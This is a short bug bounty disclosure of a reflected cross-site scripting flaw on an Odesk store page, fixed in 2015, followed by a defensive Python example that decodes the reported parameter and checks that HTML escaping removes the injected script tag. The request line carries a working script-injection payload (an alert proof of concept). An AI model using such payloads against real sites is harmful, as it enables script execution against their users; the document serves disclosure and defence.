Bug Bounty on ODESK

While surfing the Odesk website, I was able to find a reflected XSS on their store page. Odesk accepted this after 2 months. This bug was fixed on 8th April 2015.

XSS

Request

GET /store/index.php?_=basket&ref=%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E HTTP/1.1
Host: www.odesklabs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
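
From the defender's side, the request above can be replayed offline against a template to show what HTML-encoding the `ref` value changes. This is an added example, not code from the original post or from Odesk; the `TEMPLATE` string is an assumption, since the report does not say where in the page `ref` was echoed.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Request line copied from the report above.
REQUEST_LINE = ("GET /store/index.php?_=basket&ref=%3E%3C/SCRIPT%3E%22%3E%27%3E"
                "%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E HTTP/1.1")

# Hypothetical template: the report does not say where the page echoed `ref`.
TEMPLATE = '<a href="/store/index.php?ref={ref}">Back to store</a>'


def ref_param(request_line):
    """Return the URL-decoded `ref` query parameter from an HTTP request line."""
    target = request_line.split(" ")[1]
    return parse_qs(urlsplit(target).query)["ref"][0]


class ScriptCounter(HTMLParser):
    """Counts <script> start tags as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":  # HTMLParser lowercases tag names
            self.scripts += 1


def script_tags(markup):
    parser = ScriptCounter()
    parser.feed(markup)
    parser.close()
    return parser.scripts


def render_unsafe(ref):
    return TEMPLATE.format(ref=ref)

def render_escaped(ref):
    # quote=True also encodes " and ', which the value uses to leave an attribute.
    return TEMPLATE.format(ref=escape(ref, quote=True))


if __name__ == "__main__":
    ref = ref_param(REQUEST_LINE)
    print("decoded ref:", ref)
    print("unsafe :", script_tags(render_unsafe(ref)), "script tag(s)")
    print("escaped:", script_tags(render_escaped(ref)), "script tag(s)")
```

The same `script_tags` check can be used as a regression test on any response that echoes request parameters.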